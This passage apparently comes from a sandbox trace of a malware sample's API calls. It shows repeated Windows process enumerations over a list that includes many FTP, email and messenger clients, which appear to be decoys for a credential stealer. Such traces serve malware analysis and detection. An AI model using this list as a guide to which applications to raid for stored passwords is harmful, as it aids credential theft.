th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0285.220] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0285.222] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.223] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0285.225] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0285.226] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0285.228] CloseHandle (hObject=0x21f8) returned 1 [0285.228] Sleep (dwMilliseconds=0x64) [0285.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0285.351] Process32First (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.352] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0285.354] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0285.357] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.359] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0285.360] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.361] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0285.363] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0285.364] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0285.366] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.367] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.369] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0285.371] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.374] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.376] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.377] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.379] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.380] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.381] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.383] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0285.391] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0285.394] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0285.396] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.397] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0285.399] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0285.400] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0285.404] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0285.406] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0285.407] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.409] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0285.411] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0285.412] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.414] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0285.415] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0285.419] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0285.421] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0285.422] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0285.424] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0285.426] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0285.427] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0285.429] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0285.430] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0285.432] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0285.523] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0285.525] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0285.527] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0285.531] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0285.532] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0285.534] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0285.535] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0285.537] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0285.538] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0285.540] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0285.544] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0285.546] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0285.547] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0285.549] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0285.551] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0285.552] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0285.554] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0285.556] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0285.790] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0285.792] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0285.796] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0285.798] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0285.800] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0285.802] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0285.804] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0285.806] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0285.810] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0285.812] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0285.813] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0285.816] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0285.817] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0285.819] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0285.821] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0285.823] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0285.827] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0285.829] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: 